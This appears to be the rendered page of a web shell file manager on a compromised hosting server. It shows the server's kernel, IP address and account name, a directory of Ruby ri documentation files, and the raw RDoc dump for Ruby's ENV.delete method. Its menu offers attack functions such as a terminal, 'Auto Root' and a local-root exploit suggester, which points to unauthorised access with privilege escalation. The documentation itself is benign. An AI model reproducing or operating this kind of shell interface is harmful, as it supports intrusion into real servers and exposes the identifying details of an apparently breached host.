Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
share /
ri /
system /
ENV /
Delete
Unzip
Name
Size
Permission
Date
Action
%5b%5d%3d-c.ri
2.17
KB
-rw-r--r--
2024-06-26 17:25
%5b%5d-c.ri
661
B
-rw-r--r--
2024-06-26 17:25
assoc-c.ri
1.39
KB
-rw-r--r--
2024-06-26 17:25
cdesc-ENV.ri
4.89
KB
-rw-r--r--
2024-06-26 17:25
clear-c.ri
480
B
-rw-r--r--
2024-06-26 17:25
delete-c.ri
1.35
KB
-rw-r--r--
2024-06-26 17:25
delete_if-c.ri
1.2
KB
-rw-r--r--
2024-06-26 17:25
each-c.ri
942
B
-rw-r--r--
2024-06-26 17:25
each_key-c.ri
834
B
-rw-r--r--
2024-06-26 17:25
each_pair-c.ri
952
B
-rw-r--r--
2024-06-26 17:25
each_value-c.ri
853
B
-rw-r--r--
2024-06-26 17:25
empty%3f-c.ri
498
B
-rw-r--r--
2024-06-26 17:25
except-c.ri
591
B
-rw-r--r--
2024-06-26 17:25
fetch-c.ri
1.65
KB
-rw-r--r--
2024-06-26 17:25
filter%21-c.ri
1.86
KB
-rw-r--r--
2024-06-26 17:25
filter-c.ri
1.39
KB
-rw-r--r--
2024-06-26 17:25
freeze-c.ri
386
B
-rw-r--r--
2024-06-26 17:25
has_key%3f-c.ri
1.67
KB
-rw-r--r--
2024-06-26 17:25
has_value%3f-c.ri
668
B
-rw-r--r--
2024-06-26 17:25
include%3f-c.ri
1.67
KB
-rw-r--r--
2024-06-26 17:25
inspect-c.ri
482
B
-rw-r--r--
2024-06-26 17:25
invert-c.ri
903
B
-rw-r--r--
2024-06-26 17:25
keep_if-c.ri
1.05
KB
-rw-r--r--
2024-06-26 17:25
key%3f-c.ri
1.66
KB
-rw-r--r--
2024-06-26 17:25
key-c.ri
962
B
-rw-r--r--
2024-06-26 17:25
keys-c.ri
642
B
-rw-r--r--
2024-06-26 17:25
length-c.ri
486
B
-rw-r--r--
2024-06-26 17:25
member%3f-c.ri
1.67
KB
-rw-r--r--
2024-06-26 17:25
merge%21-c.ri
2.46
KB
-rw-r--r--
2024-06-26 17:25
rassoc-c.ri
827
B
-rw-r--r--
2024-06-26 17:25
rehash-c.ri
393
B
-rw-r--r--
2024-06-26 17:25
reject%21-c.ri
1.3
KB
-rw-r--r--
2024-06-26 17:25
reject-c.ri
979
B
-rw-r--r--
2024-06-26 17:25
replace-c.ri
1.06
KB
-rw-r--r--
2024-06-26 17:25
select%21-c.ri
1.86
KB
-rw-r--r--
2024-06-26 17:25
select-c.ri
1.39
KB
-rw-r--r--
2024-06-26 17:25
shift-c.ri
843
B
-rw-r--r--
2024-06-26 17:25
size-c.ri
482
B
-rw-r--r--
2024-06-26 17:25
slice-c.ri
878
B
-rw-r--r--
2024-06-26 17:25
store-c.ri
2.17
KB
-rw-r--r--
2024-06-26 17:25
to_a-c.ri
532
B
-rw-r--r--
2024-06-26 17:25
to_h-c.ri
1.31
KB
-rw-r--r--
2024-06-26 17:25
to_hash-c.ri
492
B
-rw-r--r--
2024-06-26 17:25
to_s-c.ri
360
B
-rw-r--r--
2024-06-26 17:25
update-c.ri
2.46
KB
-rw-r--r--
2024-06-26 17:25
value%3f-c.ri
660
B
-rw-r--r--
2024-06-26 17:25
values-c.ri
661
B
-rw-r--r--
2024-06-26 17:25
values_at-c.ri
952
B
-rw-r--r--
2024-06-26 17:25
Save
Rename
U:RDoc::AnyMethod[iI"delete:ETI"ENV::delete;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"UDeletes the environment variable with +name+ if it exists and returns its value:;To:RDoc::Markup::Verbatim; [I"ENV['foo'] = '0' ;TI" ENV.delete('foo') # => '0' ;T:@format0o; ; [I"^If a block is not given and the named environment variable does not exist, returns +nil+.;To:RDoc::Markup::BlankLine o; ; [I"CIf a block given and the environment variable does not exist, ;TI"Cyields +name+ to the block and returns the value of the block:;To;; [I"9ENV.delete('foo') { |name| name * 2 } # => "foofoo" ;T;0o; ; [I";If a block given and the environment variable exists, ;TI"Qdeletes the environment variable and returns its value (ignoring the block):;To;; [I"ENV['foo'] = '0' ;TI";ENV.delete('foo') { |name| raise 'ignored' } # => "0" ;T;0o; ; [I"/Raises an exception if +name+ is invalid. ;TI"OSee {Invalid Names and Values}[#class-ENV-label-Invalid+Names+and+Values].;T: @fileI"hash.c;T:0@omit_headings_from_table_of_contents_below0I"�ENV.delete(name) -> value ENV.delete(name) { |name| block } -> value ENV.delete(missing_name) -> nil ENV.delete(missing_name) { |name| block } -> block_value ;T0[ I" (p1);T@)FI"ENV;TcRDoc::NormalClass00